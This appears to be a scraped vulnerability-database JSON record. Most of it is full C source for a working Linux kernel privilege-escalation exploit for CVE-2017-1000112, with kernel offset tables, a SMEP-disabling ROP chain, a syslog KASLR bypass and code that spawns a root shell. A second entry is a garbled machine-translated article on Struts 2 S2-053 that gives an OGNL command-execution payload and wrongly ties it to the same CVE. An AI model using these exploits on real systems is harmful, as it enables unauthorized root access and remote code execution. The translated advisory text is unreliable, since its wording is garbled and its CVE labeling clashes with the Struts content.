},\n\t{ \"trusty\", \"4.4.0-67-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-70-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-71-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-72-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-75-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-78-generic\", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-79-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },\n\t{ \"trusty\", \"4.4.0-81-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },\n\t{ \"trusty\", \"4.4.0-83-generic\", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\n\t{ \"xenial\", \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\n\t{ \"xenial\", \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\n\t{ \"xenial\", \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-46-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-49-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-52-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-54-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-56-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\n\t{ \"xenial\", \"4.8.0-58-generic\", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },\n { \"xenial\", \"4.4.0-81-generic\", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },\t\n};\n\n// Used to get root privileges.\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\n\n// Used when ENABLE_SMEP_BYPASS is used.\n// - xchg eax, esp ; ret\n// - pop rdi ; ret\n// - mov dword ptr [rdi], eax ; ret\n// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret\n// - neg rax ; ret\n// - pop rcx ; ret \n// - or rax, rcx ; ret\n// - xchg eax, edi ; ret\n// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret\n// - jmp rcx\n#define XCHG_EAX_ESP_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)\n#define POP_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rdi_ret)\n#define MOV_DWORD_PTR_RDI_EAX_RET\t(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)\n#define MOV_RAX_CR4_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)\n#define NEG_RAX_RET\t\t\t(KERNEL_BASE + kernels[kernel].neg_rax_ret)\n#define POP_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rcx_ret)\n#define OR_RAX_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)\n#define XCHG_EAX_EDI_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)\n#define MOV_CR4_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)\n#define JMP_RCX\t\t\t\t(KERNEL_BASE + kernels[kernel].jmp_rcx)\n\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\n\ntypedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);\n\nvoid get_root(void) {\n\t((_commit_creds)(COMMIT_CREDS))(\n\t ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));\n}\n\n// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *\n\nuint64_t saved_esp;\n\n// Unfortunately GCC does not support `__atribute__((naked))` on x86, which\n// can be used to omit a function's prologue, so I had to use this weird\n// wrapper hack as a workaround. Note: Clang does support it, which means it\n// has better support of GCC attributes than GCC itself. Funny.\nvoid wrapper() {\n\tasm volatile (\"\t\t\t\t\t\\n\\\n\tpayload:\t\t\t\t\t\\n\\\n\t\tmovq %%rbp, %%rax\t\t\t\\n\\\n\t\tmovq $0xffffffff00000000, %%rdx\t\t\\n\\\n\t\tandq %%rdx, %%rax\t\t\t\\n\\\n\t\tmovq %0, %%rdx\t\t\t\t\\n\\\n\t\taddq %%rdx, %%rax\t\t\t\\n\\\n\t\tmovq %%rax, %%rsp\t\t\t\\n\\\n\t\tcall get_root\t\t\t\t\\n\\\n\t\tret\t\t\t\t\t\\n\\\n\t\" : : \"m\"(saved_esp) : );\n}\n\nvoid payload();\n\n#define CHAIN_SAVE_ESP\t\t\t\t\\\n\t*stack++ = POP_RDI_RET;\t\t\t\\\n\t*stack++ = (uint64_t)&saved_esp;\t\\\n\t*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;\n\n#define SMEP_MASK 0x100000\n\n#define CHAIN_DISABLE_SMEP\t\t\t\\\n\t*stack++ = MOV_RAX_CR4_RET;\t\t\\\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\n\t*stack++ = POP_RCX_RET;\t\t\t\\\n\t*stack++ = SMEP_MASK;\t\t\t\\\n\t*stack++ = OR_RAX_RCX_RET;\t\t\\\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\n\t*stack++ = XCHG_EAX_EDI_RET;\t\t\\\n\t*stack++ = MOV_CR4_RDI_RET;\n\n#define CHAIN_JMP_PAYLOAD \\\n\t*stack++ = POP_RCX_RET; \\\n\t*stack++ = (uint64_t)&payload; \\\n\t*stack++ = JMP_RCX;\n\nvoid mmap_stack() {\n\tuint64_t stack_aligned, stack_addr;\n\tint page_size, stack_size, stack_offset;\n\tuint64_t* stack;\n\n\tpage_size = getpagesize();\n\n\tstack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);\n\tstack_addr = stack_aligned - page_size * 4;\n\tstack_size = page_size * 8;\n\tstack_offset = XCHG_EAX_ESP_RET % page_size;\n\n\tstack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,\n\t\t\tMAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\n\tif (stack == MAP_FAILED || stack != (void*)stack_addr) {\n\t\tperror(\"[-] mmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstack = (uint64_t*)((char*)stack_aligned + stack_offset);\n\n\tCHAIN_SAVE_ESP;\n\tCHAIN_DISABLE_SMEP;\n\tCHAIN_JMP_PAYLOAD;\n}\n\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\n\n#define SYSLOG_ACTION_READ_ALL 3\n#define SYSLOG_ACTION_SIZE_BUFFER 10\n\nvoid mmap_syslog(char** buffer, int* size) {\n\t*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\n\tif (*size == -1) {\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t*size = (*size / getpagesize() + 1) * getpagesize();\n\t*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\n\t\t\t\t MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n\n\t*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\n\tif (*size == -1) {\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\n\tconst char* needle1 = \"Freeing unused\";\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n\tif (substr == NULL) {\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint start = 0;\n\tint end = 0;\n\tfor (end = start; substr[end] != '-'; end++);\n\n\tconst char* needle2 = \"ffffff\";\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n\tif (substr == NULL) {\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tchar* endptr = &substr[16];\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\n\n\tr &= 0xffffffffff000000ul;\n\n\treturn r;\n}\n\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\n\tconst char* needle1 = \"Freeing unused\";\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n\tif (substr == NULL) {\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint start = 0;\n\tint end = 0;\n\tfor (start = 0; substr[start] != '-'; start++);\n\tfor (end = start; substr[end] != '\\n'; end++);\n\n\tconst char* needle2 = \"ffffff\";\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n\tif (substr == NULL) {\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tchar* endptr = &substr[16];\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\n\n\tr &= 0xfffffffffff00000ul;\n\tr -= 0x1000000ul;\n\n\treturn r;\n}\n\nunsigned long get_kernel_addr() {\n\tchar* syslog;\n\tint size;\n\tmmap_syslog(&syslog, &size);\n\n\tif (strcmp(\"trusty\", kernels[kernel].distro) == 0 &&\n\t strncmp(\"4.4.0\", kernels[kernel].version, 5) == 0)\n\t\treturn get_kernel_addr_trusty(syslog, size);\n\tif (strcmp(\"xenial\", kernels[kernel].distro) == 0 &&\n\t strncmp(\"4.4.0\", kernels[kernel].version, 5) == 0 ||\n\t strncmp(\"4.8.0\", kernels[kernel].version, 5) == 0)\n\t\treturn get_kernel_addr_xenial(syslog, size);\n\n\tprintf(\"[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*\");\n\texit(EXIT_FAILURE);\n}\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\nstruct ubuf_info {\n\tuint64_t callback;\t// void (*callback)(struct ubuf_info *, bool)\n\tuint64_t ctx;\t\t// void *\n\tuint64_t desc;\t\t// unsigned long\n};\n\nstruct skb_shared_info {\n\tuint8_t nr_frags;\t// unsigned char\n\tuint8_t tx_flags;\t// __u8\n\tuint16_t gso_size;\t// unsigned short\n\tuint16_t gso_segs;\t// unsigned short\n\tuint16_t gso_type;\t// unsigned short\n\tuint64_t frag_list;\t// struct sk_buff *\n\tuint64_t hwtstamps;\t// struct skb_shared_hwtstamps\n\tuint32_t tskey;\t\t// u32\n\tuint32_t ip6_frag_id;\t// __be32\n\tuint32_t dataref;\t// atomic_t\n\tuint64_t destructor_arg; // void *\n\tuint8_t frags[16][17];\t// skb_frag_t frags[MAX_SKB_FRAGS];\n};\n\nstruct ubuf_info ui;\n\nvoid init_skb_buffer(char* buffer, unsigned long func) {\n\tstruct skb_shared_info* ssi = (struct skb_shared_info*)buffer;\n\tmemset(ssi, 0, sizeof(*ssi));\n\n\tssi->tx_flags = 0xff;\n\tssi->destructor_arg = (uint64_t)&ui;\n\tssi->nr_frags = 0;\n\tssi->frag_list = 0;\n\n\tui.callback = func;\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\n#define SHINFO_OFFSET 3164\n\nvoid oob_execute(unsigned long payload) {\n\tchar buffer[4096];\n\tmemset(&buffer[0], 0x42, 4096);\n\tinit_skb_buffer(&buffer[SHINFO_OFFSET], payload);\n\n\tint s = socket(PF_INET, SOCK_DGRAM, 0);\n\tif (s == -1) {\n\t\tperror(\"[-] socket()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstruct sockaddr_in addr;\n\tmemset(&addr, 0, sizeof(addr));\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(8000);\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n\n\tif (connect(s, (void*)&addr, sizeof(addr))) {\n\t\tperror(\"[-] connect()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint size = SHINFO_OFFSET + sizeof(struct skb_shared_info);\n\tint rv = send(s, buffer, size, MSG_MORE);\n\tif (rv != size) {\n\t\tperror(\"[-] send()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint val = 1;\n\trv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));\n\tif (rv != 0) {\n\t\tperror(\"[-] setsockopt(SO_NO_CHECK)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsend(s, buffer, 1, 0);\n\n\tclose(s);\n}\n\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\n\n#define CHUNK_SIZE 1024\n\nint read_file(const char* file, char* buffer, int max_length) {\n\tint f = open(file, O_RDONLY);\n\tif (f == -1)\n\t\treturn -1;\n\tint bytes_read = 0;\n\twhile (true) {\n\t\tint bytes_to_read = CHUNK_SIZE;\n\t\tif (bytes_to_read > max_length - bytes_read)\n\t\t\tbytes_to_read = max_length - bytes_read;\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\n\t\tif (rv == -1)\n\t\t\treturn -1;\n\t\tbytes_read += rv;\n\t\tif (rv == 0)\n\t\t\treturn bytes_read;\n\t}\n}\n\n#define LSB_RELEASE_LENGTH 1024\n\nvoid get_distro_codename(char* output, int max_length) {\n\tchar buffer[LSB_RELEASE_LENGTH];\n\tint length = read_file(\"/etc/lsb-release\", &buffer[0], LSB_RELEASE_LENGTH);\n\tif (length == -1) {\n\t\tperror(\"[-] open/read(/etc/lsb-release)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tconst char *needle = \"DISTRIB_CODENAME=\";\n\tint needle_length = strlen(needle);\n\tchar* found = memmem(&buffer[0], length, needle, needle_length);\n\tif (found == NULL) {\n\t\tprintf(\"[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tint i;\n\tfor (i = 0; found[needle_length + i] != '\\n'; i++) {\n\t\tassert(i < max_length);\n\t\tassert((found - &buffer[0]) + needle_length + i < length);\n\t\toutput[i] = found[needle_length + i];\n\t}\n}\n\nvoid get_kernel_version(char* output, int max_length) {\n\tstruct utsname u;\n\tint rv = uname(&u);\n\tif (rv != 0) {\n\t\tperror(\"[-] uname())\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tassert(strlen(u.release) <= max_length);\n\tstrcpy(&output[0], u.release);\n}\n\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\n\n#define DISTRO_CODENAME_LENGTH 32\n#define KERNEL_VERSION_LENGTH 32\n\nvoid detect_versions() {\n\tchar codename[DISTRO_CODENAME_LENGTH];\n\tchar version[KERNEL_VERSION_LENGTH];\n\n\tget_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);\n\tget_kernel_version(&version[0], KERNEL_VERSION_LENGTH);\n\n\tint i;\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\n\t\tif (strcmp(&codename[0], kernels[i].distro) == 0 &&\n\t\t strcmp(&version[0], kernels[i].version) == 0) {\n\t\t\tprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\n\t\t\tkernel = i;\n\t\t\treturn;\n\t\t}\n\t}\n\n\tprintf(\"[-] kernel version not recognized\\n\");\n\texit(EXIT_FAILURE);\n}\n\n#define PROC_CPUINFO_LENGTH 4096\n\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\nint smap_smep_enabled() {\n\tchar buffer[PROC_CPUINFO_LENGTH];\n\tint length = read_file(\"/proc/cpuinfo\", &buffer[0], PROC_CPUINFO_LENGTH);\n\tif (length == -1) {\n\t\tperror(\"[-] open/read(/proc/cpuinfo)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tint rv = 0;\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\n\tif (found != NULL)\n\t\trv += 1;\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\n\tif (found != NULL)\n\t\trv += 2;\n\treturn rv;\n}\n\nvoid check_smep_smap() {\n\tint rv = smap_smep_enabled();\n\tif (rv >= 2) {\n\t\tprintf(\"[-] SMAP detected, no bypass available\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n#if !ENABLE_SMEP_BYPASS\n\tif (rv >= 1) {\n\t\tprintf(\"[-] SMEP detected, use ENABLE_SMEP_BYPASS\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n#endif\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nstatic bool write_file(const char* file, const char* what, ...) {\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\nvoid setup_sandbox() {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n\tif (unshare(CLONE_NEWUSER) != 0) {\n\t\tprintf(\"[!] unprivileged user namespaces are not available\\n\");\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (unshare(CLONE_NEWNET) != 0) {\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)) {\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tcpu_set_t my_set;\n\tCPU_ZERO(&my_set);\n\tCPU_SET(0, &my_set);\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\n\t\tperror(\"[-] sched_setaffinity()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (system(\"/sbin/ifconfig lo mtu 1500\") != 0) {\n\t\tperror(\"[-] system(/sbin/ifconfig lo mtu 1500)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\n\t\tperror(\"[-] system(/sbin/ifconfig lo up)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid exec_shell() {\n\tchar* shell = \"/bin/bash\";\n\tchar* args[] = {shell, \"-i\", NULL};\n\texecve(shell, args, NULL);\n}\n\nbool is_root() {\n\t// We can't simple check uid, since we're running inside a namespace\n\t// with uid set to 0. Try opening /etc/shadow instead.\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\n\tif (fd == -1)\n\t\treturn false;\n\tclose(fd);\n\treturn true;\n}\n\nvoid check_root() {\n\tprintf(\"[.] checking if we got root\\n\");\n\tif (!is_root()) {\n\t\tprintf(\"[-] something went wrong =(\\n\");\n\t\treturn;\n\t}\n\tprintf(\"[+] got r00t ^_^\\n\");\n\texec_shell();\n}\n\nint main(int argc, char** argv) {\n\tprintf(\"[.] starting\\n\");\n\n\tprintf(\"[.] checking distro and kernel versions\\n\");\n\tdetect_versions();\n\tprintf(\"[~] done, versions looks good\\n\");\n\n\tprintf(\"[.] checking SMEP and SMAP\\n\");\n\tcheck_smep_smap();\n\tprintf(\"[~] done, looks good\\n\");\n\n\tprintf(\"[.] setting up namespace sandbox\\n\");\n\tsetup_sandbox();\n\tprintf(\"[~] done, namespace sandbox set up\\n\");\n\n#if ENABLE_KASLR_BYPASS\n\tprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\n\tKERNEL_BASE = get_kernel_addr();\n\tprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\n#endif\n\n\tprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\n\tprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\n\n\tunsigned long payload = (unsigned long)&get_root;\n\n#if ENABLE_SMEP_BYPASS\n\tprintf(\"[.] SMEP bypass enabled, mmapping fake stack\\n\");\n\tmmap_stack();\n\tpayload = XCHG_EAX_ESP_RET;\n\tprintf(\"[~] done, fake stack mmapped\\n\");\n#endif\n\n\tprintf(\"[.] executing payload %lx\\n\", payload);\n\toob_execute(payload);\n\tprintf(\"[~] done, should be root now\\n\");\n\n\tcheck_root();\n\n\treturn 0;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-09-17T20:52:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000112"], "edition": 1, "description": "Flaws vulnerability bug overview\n\nFlaws vulnerability bug example\n\nLong distance code to fulfil flaws vulnerability bug\n\nCVE-ID\n\nCVE-2017-1000112\n\nPersecution of the grade\n\nHigh-risk\n\nImpact version\n\nStruts 2.0.1 Struts 2.3.33 Struts 2.5 \u2013 Struts 2.5.10\n\nFlaws vulnerability bug persecution\n\nWhen the developer in the Freemarker tags in applications the following code when&lt;@s. hidden name=\u201dredirectUri\u201d value=redirectUri /&gt;&lt;@s. hidden name=\u201dredirectUri\u201d value=\u201d${redirectUri}\u201d /&gt;Freemarker will be a value when the expression stops fulfill, at last incurred the code to fulfill.\n\npoc example\n\n%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess? (#_memberAccess=#dm):((#container=#context['com. opensymphony. xwork2. ActionContext. container']). (#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). (#context. setMemberAccess(#dm)))). (#cmd='/usr/bin/touch /tmp/vuln'). (#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). (#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). (#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). (#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). getOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). (#ros. flush())} \npoc debugging\n\nA brief browse of the poc, in accordance with the usual practice, the Breakpoints hit in the ProcessBuilder class start()way\n\n//the java. lang. ProcessBuilder \npublic Process start() throws IOException { \n// Must convert to array first -- a malicious user-supplied \n// list might try to circumvent the security check. \nString[] cmdarray = command. toArray(new String[command. size()]); \ncmdarray = cmdarray. clone(); \nfor (String arg : cmdarray) \nif (arg == null) \nthrow new NullPointerException(); \n// Throws IndexOutOfBoundsException if command is empty \nString prog = cmdarray[0]; \nSecurityManager security = System. getSecurityManager(); \nif (security != null) \nsecurity. checkExec(prog); \nString dir = directory == null ? null : directory. toString(); \nfor (int i = 1; i &lt; cmdarray. length; i++) { \nif (cmdarray[i]. indexOf('\\u0000') &gt;= 0) { \nthrow new IOException(\"invalid null character in command\"); \n} \n} \ntry { \nreturn ProcessImpl. start(cmdarray, \nenvironment, \ndir, \nredirects, \nredirectErrorStream); \n} catch (IOException | IllegalArgumentException e) { \nString exceptionInfo = \": \"+ e. getMessage(); \nThrowable cause = e; \nif ((e instanceof IOException) &amp;&amp; amp; security != null) { \n// Can not disclose the fail reason for read-protected files. \ntry { \nsecurity. checkRead(prog); \n\n\n**[1] [[2]](<89313_2.htm>) [[3]](<89313_3.htm>) [[4]](<89313_4.htm>) [[5]](<89313_5.htm>) [next](<89313_2.htm>)**\n", "modified": "2017-09-17T00:00:00", "published": "2017-09-17T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89313.htm", "id": "MYHACK58:62201789313", "title": "Struts 2 S2-053 flaws vulnerability bug thematic research with the POC-the exploit-warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}]}